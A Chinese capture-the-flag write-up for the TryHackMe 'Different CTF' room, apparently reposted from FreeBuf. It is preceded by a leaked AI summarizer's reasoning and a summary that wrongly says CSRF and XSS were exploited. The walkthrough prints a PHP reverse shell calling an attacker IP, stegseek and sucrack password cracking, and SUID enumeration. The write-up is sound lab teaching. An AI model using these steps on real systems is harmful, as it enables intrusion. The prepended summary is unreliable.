Different CTF TryHackMe
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我得仔细阅读这篇文章,了解它的主要内容和结构。 文章主要讲的是一个渗透测试的过程。作者使用了多种工具和技术,比如扫描端口、利用WordPress漏洞、破解隐藏信息、上传反向shell等。这些步骤详细描述了攻击者如何逐步入侵系统,最终获得root权限。 接下来,我需要提炼出关键点:渗透测试、WordPress漏洞、工具使用(如dirb、stegseek)、上传反向shell、密码破解、提权到root。这些都是文章的核心内容。 然后,我要把这些点浓缩成一句话,确保不超过100字,并且表达清晰。可能的结构是先说明主题,再列举主要方法和结果。 最后,检查一下是否符合用户的要求:中文总结,直接描述内容,不使用特定开头。确保没有遗漏重要信息,并且语言简洁明了。 </think> 文章描述了一次针对WordPress平台的渗透测试过程,利用目录遍历、CSRF、XSS等漏洞进行攻击,并通过FTP上传反向Shell获取服务器控制权。随后通过密码破解和提权操作最终获得root权限。 2025-10-18 14:4:12 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

扫描端口

1760774882_68f34ae2ba7f5ac6cf1a3.png!small?1760774883562

发现21端口、80端口

访问80页面

发现这是一个使用wordpress搭建的一个平台

1760777302_68f3545672409d3f025c9.png!small?1760777305794

使用wps扫描得到WordPress 版本(5.6)主题(twentynineteen 1.8)没有什么特别好用的漏洞

WordPress 5.6(2020 年 12 月发布)存在多个中危漏洞,部分漏洞可被主动利用,具体包括:

  1. 目录遍历漏洞(CVE-2023-2745)

    • 风险:允许攻击者通过 wp_lang参数遍历服务器目录,读取敏感文件(如配置文件)。
    • 修复版本:5.6.11。
  2. 跨站请求伪造(CSRF)

    • 风险:攻击者可伪造请求,诱骗管理员执行敏感操作(如修改插件设置、发布恶意内容)。
  3. 存储型 XSS(跨站脚本)

    • 风险:低权限用户(如 Contributor)可通过嵌入功能注入恶意脚本,窃取管理员 Cookie 或劫持账户。
  4. XXE 攻击(XML 外部实体注入)

    • 风险:若服务器运行 PHP 8,攻击者可通过媒体库的 XML 解析漏洞读取服务器内部文件(如 /etc/passwd)。
  5. 密码保护文章暴露

    • 风险:低权限用户可通过编辑器的 Block 功能,绕过密码保护查看私密文章内容

没有什么好用的漏洞

使用dirb扫描网站上的文件和目录

发现目录:http://adana.thm/announcements/

发现是一张图片和一个密码本

使用stegseek破解后得到

stegseek下载链接

https://github.com/RickdeJager/stegseek/releases

破解后得到RlRQLUxPR0lOClVTRVI6IGhha2FuZnRwClBBU1M6IDEyM2FkYW5hY3JhY2s=

解码得到

[解码1次] Base64
混合解码结果:FTP-LOGIN
USER: hakanftp
PASS: 123adanacrack

尝试FTP登录

登录之后,尝试ls

1760780114_68f35f521f548345c02fd.png!small?1760780115196

下载wp-config.php,经过查看发现了数据库用户名和密码

在前期的扫描中,其实已经发现了存在phpmyadmin管理页面

使用账号和密码登录

发现存在主站和子域名

1760783382_68f36c162474f22e68d81.png!small?1760783382824

因为在主域名无法执行一些shell,可以尝试使用子域名打开

使用ftp上传反向shell

同时也发现一个用户名和密码

1760783468_68f36c6cb39147536e90d.png!small?1760783469322

1760783590_68f36ce6c458eb5d95596.png!small?1760783591379

是个付费记录,先不买

尝试上传反向shell

1760784264_68f36f88491ee5d17371b.png!small?1760784264885

<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?>

上传后,为文件加上执行权限

1760784253_68f36f7dc20c404c1fbec.png!small?1760784255438

执行访问成功

任务一

让我们查看网页下的文件

访问/var/www/html

发现wwe3bbfla4g.txt

任务二

让我们寻找用户的标签

经过查看

1760785853_68f375bd7ce9bf52917d1.png!small?1760785854119

还有一个用户是hakanbey,直接访问权限被拒绝了

1760786001_68f37651e7eaad18b098d.png!small?1760786002567

因为知道了账号名称,可以上传sucrack工具进行破解密码

https://archlinux.pkgs.org/rolling/archstrike-x86_64/sucrack-1.2.3-3-x86_64.pkg.tar.xz.html

可以直接使用ftp上传,或者apache也可以

因为观察到密码都有一个123nada,所以给password.txt都增加上123nada(我是没看出来)

sed 's/^/123nada/' password.txt > new_password.txt

再上传

使用./sucrack -u hakanbey 3.txt -w 100 -b 500

ps:一定要记得加参数,要不然很慢

得到了密码123adanasubaru

提权到hakanbey

因为前面是

调整下环境

python3 -c 'import pty; pty.spawn("/bin/bash")'

直接su hakanbey

提权至root

找到user.txt后

尝试执行

find / -perm -u=s -type f 2>/dev/null

或者

find / -perm /4000 2>/dev/null

发现了疑似的后门软件

1760793168_68f392504ac4f5d2342a8.png!small?1760793169693

学到了

使用ltrace /usr/bin/binary

1760793646_68f3942e2ca48ddc28a9e.png!small?1760793646694

让我输入一个字符串

输入warzoneinadana

输入后提示我得到了一张图片

1760794167_68f3963792aa31dfaca04.png!small?1760794168228

暗示我需要使用16进制编辑器

打开之后观察00000020行

所以我会使用010editor打开

1760794622_68f397fe2576053378e6d.png!small?1760794622718

尝试破解

根据提示得到fromhex 到base85

1760795174_68f39a26c77fc8a1fba8c.png!small?1760795176155

得到了root密码

免责声明

1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。

3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/web/453240.html
如有侵权请联系:admin#unsafe.sh